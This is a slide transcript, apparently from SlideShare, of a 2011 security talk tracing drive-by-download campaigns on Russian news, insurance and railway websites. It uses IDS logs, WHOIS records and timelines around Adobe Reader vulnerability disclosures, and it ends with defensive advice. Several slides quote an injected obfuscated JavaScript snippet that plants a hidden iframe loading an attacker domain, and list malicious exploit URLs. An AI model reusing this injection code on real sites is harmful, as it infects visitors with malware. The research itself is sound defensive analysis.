Drive-By-Download Attack Evolution   Before and After Vulnerability            Disclosure       Vladimir B. Kropotov    TB...
Drive-By-Download• Hackers distribute  malware by "poisoning"  legitimate websites• Hacker injects malicious  iframes into...
What does it look like?                                       Host ready                                                  ...
How we find it?Date/Time       2011-08-05 10:44:53 YEKSTTag Name        PDF_XFA_ScriptObservance Type        Intrusion Det...
DOES USER NEED IT??    How we find it?Date/Time       2011-08-05 10:44:53Tag Name        PDF_XFA_ScriptTarget IP Address  ...
First indicatorsDate/Time 2011-07-26 11:24:37Tag Name PDF_XFA_Scriptarg 3592ba48df0fae9e5f5c5b09535a    070d0b04020600510f...
First indicators                                      Date/Time     2011-08-16 13:24:44                                   ...
First indicators                                        Date/Time        2011-08-09 10:17:14                              ...
First indicators  Date/Time 2011-07-26 11:24:37           Date/Time        2011-08-09 10:17:14       Date/Time     2011-08...
Example: o-strahovanie.ru
Example: o-strahovanie.ru
Example: o-strahovanie.ru SEP 02                          / ============ bbb                               ============doc...
Example: o-strahovanie.ru/ ============ bbb ============else{// 4 osel if(document.xmlSettings.getCookie(if_ik)){document....
Example: o-strahovanie.ruelse{// 4   osel   …document.body.appendChild(document.xmlSettings.iframe);document.xmlSettings.i...
Drive By Download o-strahovanie.ru Sep 02                                                                            NO   ...
Drive By Download o-strahovanie.ru Sep 12                                       Host ready                                ...
Example: o-strahovanie.ruDomain Name:DISREGARDING.INCreated On:14-Jul-2011 11:09:59 UTCRegistrant Name:Russell RosarioRegi...
Example: o-strahovanie.ruDomain Name:DISREGARDING.INCreated On:14-Jul-2011 11:09:59 UTCDomain Name:JANICULUM.IN, CHAMBERWO...
Example: o-strahovanie.ruDomain ID:D5165642-AFIN DomainName:DISREGARDING.INCreated On:14-Jul-2011 11:09:59 UTCRegistrant N...
Russell Rosario                                    Domain Name:FILTRATED.INfiltrated.in                        Created On:...
Attack before public disclosure• Primary location for malicious sites: .IN• Physical servers location by IP-Address:  Roma...
Domain owner is the sameDomain Name                Created On                Registrant Name  irrefutably.in 15-Jul-2011 1...
Vulnerability reported to vendorVUPEN Security Research - Adobe Acrobat and Reader PCX Processing Heap Overflow Vulnerabil...
Harvetering machine startedDomain Name              Created On                 Registrant Name         microdrili.in   05-...
But may be someone knows?• Spamlists• AV Vendors• Safebrowsing• Securityfocus
Spamlists, Aug 19
AV Vendors, Aug 18
Safebrowsing Aug 20
Securityfocus Sep 07Sent: Wednesday, September 07, 2011 11:31 PMSubject: There is a strange get request header in all webp...
PDF vulnerabilities public disclosure     Sep 14. What to expect?
PDF vulnerabilities public disclosure     Sep 14. What to expect?    NO GOOD NEWS,      JUST EPIC FAIL  for site administr...
No good news. Hundreds of       domains were registeredITALIA-NEW.IN                             KLERK-EVEN.RUBANER-KLERK....
“New generation”                                       Host ready                                                         ...
Attack after public disclosure• Primary location for malicious sites:   .IN, .RU, .CX.CC, .BIZ, .INFO,…• Physical servers ...
Known sites examples: RZD.RU     Russian rail roads
Known sites examples: RZD.RU
Just TWO Domains, SURE?Domain                   URLinterfax-rzd.in          http://interfax-rzd.in/news/buble.php?key=rtgd...
Known sites examples: RZD.RU     Russian rail roads
Known sites examples: RZD.RU
Known sites examples: KP.RU(Komsomolskaya Pravda, newspaper)
Known sites examples: KP.RU
Other examples: EG.RU(newspaper, 263 685 visits per day)
Other examples: svpressa.ru(newspaper 276 720 visits per day)
URA.RU (news 22 486 visits per day)
URA.RU (news 22 486 visits per           day)
URA.RU (news 22 486 visits per           day)
Other examples: ria.ru (news 667 222 visits per day)Datetime   [09/Nov/2011:12:26:45 +0300]Url        GET http://jya56yhsv...
Other examples: inosmi.ru (news          175 361visits per day)Datetime   [09/Nov/2011:12:28:10 +0300]Url        GET http:...
Other examples: glavbukh.ru (15 200 visits per day)Datetime   [09/Nov/2011:12:14:46 +0300]Url        GET http://jya56yhsvc...
Malware examples:Banks targeted attack
Malware examples:Banks targeted attack
Another news,          another phone…• Legal• Faked
Malware examples:Banks targeted attack
Malware examples:Banks targeted attack
Malware examples 01ie.ru, 02ie.ru,  03ie.ru (Registered by reg.ru)
Malware examples 01ie.ru, 02ie.ru,  03ie.ru (Registered by reg.ru)
Malware examples
Script examples
Sample analysis (Virus Total)
Sample analysis (Virus Total)
Sample analysis (Virus Total)
Sample analysis (Virus Total)
Sample analysis (Virus Total)
Sample analysis (Virus Total)
What can we do?• Patch endpoint• Tighten the Internet filtering (default denyif possible)• No Internet surfing with admin ...
Credits• Sergey V. Soldatov,                 TBINFORM (TNK-BP Group)• Konstantin Y. Kadushkin,                 TBINFORM (T...
THE END    Vladimir B. KropotovInformation security analyst TBINFORM (TNK-BP Group)  vbkropotov@tnk-bp.com    kropotov@iee...
Upcoming SlideShare
Loading in...5
×

Drive by-download attack evolution zero nights v3

1,909

Published on

Published in: Technology, Design
0 Comments
0 Likes
Statistics
Notes
  • Be the first to comment

  • Be the first to like this

No Downloads
Views
Total Views
1,909
On Slideshare
0
From Embeds
0
Number of Embeds
4
Actions
Shares
0
Downloads
0
Comments
0
Likes
0
Embeds 0
No embeds

No notes for slide

Transcript of "Drive by-download attack evolution zero nights v3"

  1. 1. Drive-By-Download Attack Evolution Before and After Vulnerability Disclosure Vladimir B. Kropotov TBINFORM (TNK-BP Group)
  2. 2. Drive-By-Download• Hackers distribute malware by "poisoning" legitimate websites• Hacker injects malicious iframes into HTML content• Vulnerabilities in Browsers, Acrobat, Java, Flash Player, etc, used You just want information by attacker about insurance, nothing more, but…
  3. 3. What does it look like? Host ready Malware Malware server controlled by attackerPC connected to the Internet Exploit OS, browser plugins, etc. INFO Exploit server controlled by attacker Known server with Intermediate server iframe controlled by attacker
  4. 4. How we find it?Date/Time 2011-08-05 10:44:53 YEKSTTag Name PDF_XFA_ScriptObservance Type Intrusion DetectionCleared Flag falseTarget IP Address 10.X.X.XTarget Object Name 9090Target Object Type Target PortTarget Service unknownSource IP Address 10.X.X.YSourcePort Name 2359:compressed zlib:server total.logeater.org:URL //images/np/45eebb038bd46a63e08665f3081fb408/6cd14aca59271182c8a04159f9ad2804.pdf
  5. 5. DOES USER NEED IT?? How we find it?Date/Time 2011-08-05 10:44:53Tag Name PDF_XFA_ScriptTarget IP Address 10.X.X.XTarget Object Name 9090Target Object Type Target PortSource IP Address 10.X.X.YSourcePort Name 2359:compressed zlib:server total.logeater.org:URL //images/np/45eebb038bd46a63e08665f3081fb408/6cd14aca59271182c8a04159f9ad2804.pdf
  6. 6. First indicatorsDate/Time 2011-07-26 11:24:37Tag Name PDF_XFA_Scriptarg 3592ba48df0fae9e5f5c5b09535a 070d0b04020600510f0c56075c0 6040750compressed zlibserver mamjhvbw.dyndns.proURL /ghqlv3ym/
  7. 7. First indicators Date/Time 2011-08-16 13:24:44 Tag Name ActiveX_Warning :clsid CAFEEFAC-DEC7-0000-0000- ABCDEFFEDCBA server skipetar.in URL /jb/pda.js Date/Time 2011-08-18 19:00:13 Tag Name ActiveX_Warning clsid CAFEEFAC-DEC7-0000-0000- ABCDEFFEDCBA server e1in.in URL /stat/574a353789f/pda.js
  8. 8. First indicators Date/Time 2011-08-09 10:17:14 Tag Name PDF_XFA_Script arg host=http://inaptly.in&b=486def4 compressed gzip server inaptly.in URL /jb/lastrger.phpDate/Time 2011-08-14 14:06:28 Date/Time 2011-08-18 19:00:13Tag Name PDF_XFA_Script Tag Name PDF_XFA_Script:arg host=http://oligist.in&b=486def4 arg host=http://e1in.in/stat&u=root:compressed gzip compressed zlib:server oligist.in server e1in.in URL /stat/574a353789f/lastrger.php:URL /jb/lastrger.php
  9. 9. First indicators Date/Time 2011-07-26 11:24:37 Date/Time 2011-08-09 10:17:14 Date/Time 2011-08-16 13:24:44 Tag Name PDF_XFA_Script Tag Name PDF_XFA_Script arg host=http://inaptly.in&b=486def4 Tag Name ActiveX_Warning compressed gzip :clsid CAFEEFAC-DEC7-0000-0000- arg 3592ba48df0fae9e5f5c5b09535a ABCDEFFEDCBA 070d0b04020600510f0c56075c0 server inaptly.in 6040750 compressed zlib server skipetar.in server mamjhvbw.dyndns.pro URL /jb/lastrger.php URL /jb/pda.js URL /ghqlv3ym/Date/Time 2011-08-14 14:06:28 Date/Time 2011-08-18 19:00:13 Date/Time 2011-08-18 19:00:13Tag Name PDF_XFA_Script Tag Name ActiveX_Warning Tag Name PDF_XFA_Script:arg host=http://oligist.in&b=486def4 arg host=http://e1in.in/stat&u=root clsid CAFEEFAC-DEC7-0000-0000-:compressed gzip compressed zlib ABCDEFFEDCBA:server oligist.in server e1in.in server e1in.in URL /stat/574a353789f/lastrger.php URL /stat/574a353789f/pda.js:URL /jb/lastrger.php
  10. 10. Example: o-strahovanie.ru
  11. 11. Example: o-strahovanie.ru
  12. 12. Example: o-strahovanie.ru SEP 02 / ============ bbb ============document.xmlSettings.if_ik=false;if(window.localS torage){ if(window.localStorage.if_ik){ if(parseInt(window.localStorage.if_ik)+2592000 < document.xmlSettings.time()) document.xmlSettings.if_ik=true; }else document.xmlSettings.if_ik=true;}else{// 4 osel if(document.xmlSettings.getCookie(if_ik)){ if(parseInt(document.xmlSettings.getCookie(if_ik))+2592000 < document.xmlSettings.time()) document.xmlSettings.if_ik=true; }else document.xmlSettings.if_ik=true; }if(document.xmlSettings.if_ik){ if(window.localStorage)window.localStorage.if_ik=docu ment.xmlSettings.time(); else document.xmlSettings.setCookie(if_ik,document.xmlSettings.ti me(),{ expires:(document.xmlSettings.time() + 86400*365) });Cookie: document.xmlSettings.iframe=document.createElement (iframe);if_ik1315314771 document.xmlSettings.iframe.style.cssText=height:1px;www.o-strahovanie.ru/ position:absolute;width:1px;border:none;left:- 5000px;;16004293056256333102392 document.body.appendChild(document.xmlSettings.ifra93001403230174358* me); document.xmlSettings.iframe.src=htt+p://+disreg+a rding.i+n/xtqd2/08.p+hp;}
  13. 13. Example: o-strahovanie.ru/ ============ bbb ============else{// 4 osel if(document.xmlSettings.getCookie(if_ik)){document.xmlSettings.iframe=document.createElement(iframe); document.xmlSettings.iframe.style.cssText=height:1px;position:absolute;width:1px;border:none;left:-5000px;; document.body.appendChild(document.xmlSettings.iframe); document.xmlSettings.iframe.src=htt+p://+disreg+arding.i+n/xtqd2/08.p+hp;}Cookie: if_ik1315314771www.o-strahovanie.ru/1600429305625633310239293001403230174358*
  14. 14. Example: o-strahovanie.ruelse{// 4 osel …document.body.appendChild(document.xmlSettings.iframe);document.xmlSettings.iframe.src=htt+p://+disreg+arding.i+n/xtqd2/08.p+hp;} iframe.src=http://disregarding.in/xtqd2/08.php
  15. 15. Drive By Download o-strahovanie.ru Sep 02 NO Host ready Malware Malware serverPC connected to the Internet Exploit NO OS, browser plugins, etc. INFO Exploit server Known server with Intermediate server iframe disregarding.in
  16. 16. Drive By Download o-strahovanie.ru Sep 12 Host ready Malware Malware server chamberwoman.inPC connected to janiculum.in the Internet Exploit OS, browser plugins, etc. INFO Exploit server chamberwoman.in janiculum.in Known server with Intermediate server iframe disregarding.in
  17. 17. Example: o-strahovanie.ruDomain Name:DISREGARDING.INCreated On:14-Jul-2011 11:09:59 UTCRegistrant Name:Russell RosarioRegistrant Street1:136 Oakdale AvenueCity:Winter HavenRegistrant Country:USEmail:russellsrosario@teleworm.comName Server:NS1.PRIDES.ME Name Server:NS2.PRIDES.MEDomain Name:JANICULUM.IN, CHAMBERWOMAN.INCreated On:12-Sep-2011 08:14 UTCRegistrant Name:Russell Rosario
  18. 18. Example: o-strahovanie.ruDomain Name:DISREGARDING.INCreated On:14-Jul-2011 11:09:59 UTCDomain Name:JANICULUM.IN, CHAMBERWOMAN.INCreated On:12-Sep-2011 08:14 UTCRegistrant Name:Russell RosarioNo Payload, because No Payload Requests?Are they looking for customers?
  19. 19. Example: o-strahovanie.ruDomain ID:D5165642-AFIN DomainName:DISREGARDING.INCreated On:14-Jul-2011 11:09:59 UTCRegistrant Name: Russell RosarioRegistrant Street1:136 Oakdale AvenueCity:Winter HavenRegistrant Country:USEmail:russellsrosario@teleworm.comName Server:NS1.PRIDES.ME Name Server:NS2.PRIDES.ME
  20. 20. Russell Rosario Domain Name:FILTRATED.INfiltrated.in Created On:14-Jul-2011 11:09:53 UTC Sponsoring Registrar:Directi Web Services Pvt. Ltd. (R118-AFIN)Created On:14-Jul-2011 11:09:56 UTC Registrant ID:TS_16731618raptnesses.in Registrant Name:Russell Rosario Registrant Street1:136 Oakdale AvenueCreated On:14-Jul-2011 11:09:56 UTC Registrant City:Winter Haven Registrant State/Province:Floridatansies.in Registrant Postal Code:33830 Registrant Country:USCreated On:14-Jul-2011 11:10:03 UTC Registrant Phone:+1.8635571308 Email:russellsrosario@teleworm.com But Sally Doesnt Know…
  21. 21. Attack before public disclosure• Primary location for malicious sites: .IN• Physical servers location by IP-Address: Romania• Responsible person: Russell Rosario• Domains are new
  22. 22. Domain owner is the sameDomain Name Created On Registrant Name irrefutably.in 15-Jul-2011 11:00:21 UTC Russell Rosario comprador.in 25-Jul-2011 05:59:54 UTC Russell Rosario hyalines.in 29-Jul-2011 09:39:33 UTC Russell Rosario suffrago.in 01-Aug-2011 05:35:12 UTC Russell Rosario ruritanian.in 01-Aug-2011 05:35:50 UTC Russell Rosario 20-Jul-2011 Acrobat Vulnerability vendor notified
  23. 23. Vulnerability reported to vendorVUPEN Security Research - Adobe Acrobat and Reader PCX Processing Heap Overflow VulnerabilityVUPEN Security Research - Adobe Acrobat and Reader IFF Processing Heap Overflow VulnerabilityVUPEN Security Research - Adobe Acrobat and Reader Picture Dimensions Heap Overflow VulnerabilityVUPEN Security Research - Adobe Acrobat and Reader TIFF BitsPerSample Heap Overflow VulnerabilityX. DISCLOSURE TIMELINE-----------------------------2011-07-20 - Vulnerability Discovered by VUPEN and shared with TPP customers2011-09-14 - Public disclosure ZDI-11-310 : Adobe Reader Compound Glyph Index Sign Extension Remote Code Execution Vulnerability-- Disclosure Timeline:2011-07-20 - Vulnerability reported to vendor2011-10-26 - Coordinated public release of advisoryZDI-11-316 : Apple QuickTime H264 Matrix Conversion Remote Code Execution Vulnerability-- Disclosure Timeline:2011-07-20 - Vulnerability reported to vendor2011-10-27 - Coordinated public release of advisory
  24. 24. Harvetering machine startedDomain Name Created On Registrant Name microdrili.in 05-Aug-2011 07:13:08 UTC Russell Rosario oligist.in 05-Aug-2011 07:13:12 UTC Russell Rosario provost.in 05-Aug-2011 07:13:18 UTC Russell Rosario vaginalitis.in 05-Aug-2011 07:13:25 UTC Russell Rosario kremlinology.in 05-Aug-2011 07:13:35 UTC Russell Rosario invariance.in 05-Aug-2011 07:13:41 UTC Russell Rosario alleghenian.in 05-Aug-2011 07:13:48 UTC Russell Rosario dandifies.in 05-Aug-2011 07:14:06 UTC Russell Rosario xenophoby.in 05-Aug-2011 07:14:09 UTC Russell Rosario alliaria.in 05-Aug-2011 07:14:15 UTC Russell Rosario skipetar.in 05-Aug-2011 07:14:21 UTC Russell Rosario inaptly.in 05-Aug-2011 07:15:05 UTC Russell Rosario allhallowtide.in 05-Aug-2011 07:15:20 UTC Russell Rosario
  25. 25. But may be someone knows?• Spamlists• AV Vendors• Safebrowsing• Securityfocus
  26. 26. Spamlists, Aug 19
  27. 27. AV Vendors, Aug 18
  28. 28. Safebrowsing Aug 20
  29. 29. Securityfocus Sep 07Sent: Wednesday, September 07, 2011 11:31 PMSubject: There is a strange get request header in all webpages of my site? Im worry about Trojan attack! Today I found that Kasper Anti Virus has blocked my siteand says to the clients that this site is affected by a Trojan. I traced my site with Fiddler debugging tool and I found that every time I send a request to the sitea GET request handler is established to the following URL:"http://carlos.c0m.li/iframe.php?id=v4pfa2 4nw91yhoszkdmoh413ywv6cp7"
  30. 30. PDF vulnerabilities public disclosure Sep 14. What to expect?
  31. 31. PDF vulnerabilities public disclosure Sep 14. What to expect? NO GOOD NEWS, JUST EPIC FAIL for site administrators
  32. 32. No good news. Hundreds of domains were registeredITALIA-NEW.IN KLERK-EVEN.RUBANER-KLERK.RU KLERK-EVENTS.RUBANK-KLERK.RU KLERK-LAW.RUBANNER-KLERK.RU KLERK-NEW.RUBLOGS-KLERK.RU KLERK-NEWS.RUBUH-KLERK.RU KLERK-REKLAMA.RUDAILY-KP.RU KLERK-RU.RUFORUM-KLERK.RU KLERK-WORK.RUI-OBOZREVATEL.RU KLERK2.RUINTERFAX-REGION.RU OBOZREVATEL-RU.RUJOB-KLERK.RU OBOZREVATELRU.RUKLERK-BANK.RU WIKI-KLERK.RUKLERK-BANKIR.RU PRESS-RZD.RUKLERK-BIZ.RU RZD-RZD.RUKLERK-BOSS.RU IPGEOBASE.INKLERK-BUH.RU ***
  33. 33. “New generation” Host ready Malware Malware server controlled by attackerPC connected to Exploit the Internet OS, browser plugins, etc. INFO Exploit server controlled by attacker Intermediate server controlled by attacker Known server with Other known server iframe NOT controlled by attacker
  34. 34. Attack after public disclosure• Primary location for malicious sites: .IN, .RU, .CX.CC, .BIZ, .INFO,…• Physical servers location by IP-Address: International• Domains registered to different spurious persons• Domain lifetime ~ time to Blacklists appearance• Attack refers to malicious server for a short period of time, and to well known one almost all day long (Blacklist evasion technique)• If you dont know exact malware URL, site redirects to well known server• Different types of payload used: password stealers, win lockers, and even “normal” (or another ZD) files installed
  35. 35. Known sites examples: RZD.RU Russian rail roads
  36. 36. Known sites examples: RZD.RU
  37. 37. Just TWO Domains, SURE?Domain URLinterfax-rzd.in http://interfax-rzd.in/news/buble.php?key=rtgddfg%26u=rootrzd-interfax-online.in http://rzd-interfax-online.in/rzd-news/buble.php?key=rtgddfg%26u=rootnews-rzdstyle.in http://news-rzdstyle.in/new-mail/buble.php?key=rtgddfg%26u=rootrzd-rzd.in http://rzd-rzd.in/rzd5/buble.php?key=rtgddfg%26u=roottherzd-rzd.in http://therzd-rzd.in/rzd5/buble.php?key=rtgddfg%26u=rootrzd-rzdcomp.in http://rzd-rzdcomp.in/rzd5/buble.php?key=rtgddfg%26u=rootrzd-rzdcomp.in http://rzd-rzdcomp.in/rzd5/exe.php?exp=newjava%26key=rtgddfg%26u=rootrzd-rzdcomp.in http://rzd-rzdcomp.in/rzd5/exe.php?exp=newjava%26key=rtgddfg%26u=root;1press-rzd.in http://press-rzd.in/rzd/buble.php?key=rtgddfg%26u=rootrzd-press.in http://rzd-press.in/rzd/buble.php?key=rtgddfg%26u=rootrzd-banner.in http://rzd-banner.in/rzd/buble.php?key=rtgddfg%26u=rootpass-rzd.in http://pass-rzd.in/rzd/buble.php?key=rtgddfg%26u=rootrzd-ticket.in http://rzd-ticket.in/zd/buble.php?key=rtgddfg%26u=root
  38. 38. Known sites examples: RZD.RU Russian rail roads
  39. 39. Known sites examples: RZD.RU
  40. 40. Known sites examples: KP.RU(Komsomolskaya Pravda, newspaper)
  41. 41. Known sites examples: KP.RU
  42. 42. Other examples: EG.RU(newspaper, 263 685 visits per day)
  43. 43. Other examples: svpressa.ru(newspaper 276 720 visits per day)
  44. 44. URA.RU (news 22 486 visits per day)
  45. 45. URA.RU (news 22 486 visits per day)
  46. 46. URA.RU (news 22 486 visits per day)
  47. 47. Other examples: ria.ru (news 667 222 visits per day)Datetime [09/Nov/2011:12:26:45 +0300]Url GET http://jya56yhsvcsss.com/BVRQ HTTP/1.0IP 176.9.50.178Site jya56yhsvcsss.comReferrer http://ria.ru/
  48. 48. Other examples: inosmi.ru (news 175 361visits per day)Datetime [09/Nov/2011:12:28:10 +0300]Url GET http://jya56yhsvcsss.com/BVRQ HTTP/1.1IP 176.9.50.178Site jya56yhsvcsss.comReferrer http://inosmi.ru/
  49. 49. Other examples: glavbukh.ru (15 200 visits per day)Datetime [09/Nov/2011:12:14:46 +0300]Url GET http://jya56yhsvcsss.com/BVRQ HTTP/1.0IP 176.9.50.178Site jya56yhsvcsss.comReferrer http://www.glavbukh.ru/
  50. 50. Malware examples:Banks targeted attack
  51. 51. Malware examples:Banks targeted attack
  52. 52. Another news, another phone…• Legal• Faked
  53. 53. Malware examples:Banks targeted attack
  54. 54. Malware examples:Banks targeted attack
  55. 55. Malware examples 01ie.ru, 02ie.ru, 03ie.ru (Registered by reg.ru)
  56. 56. Malware examples 01ie.ru, 02ie.ru, 03ie.ru (Registered by reg.ru)
  57. 57. Malware examples
  58. 58. Script examples
  59. 59. Sample analysis (Virus Total)
  60. 60. Sample analysis (Virus Total)
  61. 61. Sample analysis (Virus Total)
  62. 62. Sample analysis (Virus Total)
  63. 63. Sample analysis (Virus Total)
  64. 64. Sample analysis (Virus Total)
  65. 65. What can we do?• Patch endpoint• Tighten the Internet filtering (default denyif possible)• No Internet surfing with admin rights• See what’s happening (continuousmonitoring)• Check if you’re well (regular technicalaudits)• Educate people
  66. 66. Credits• Sergey V. Soldatov, TBINFORM (TNK-BP Group)• Konstantin Y. Kadushkin, TBINFORM (TNK-BP Group)• Wayne Huang, ARMORIZE
  67. 67. THE END Vladimir B. KropotovInformation security analyst TBINFORM (TNK-BP Group) vbkropotov@tnk-bp.com kropotov@ieee.org

×